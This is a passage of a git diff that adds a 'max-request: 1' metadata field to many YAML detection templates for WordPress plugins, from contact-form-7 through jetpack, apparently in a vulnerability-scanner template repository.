a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 88d38e21ed..23a88ea130 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: 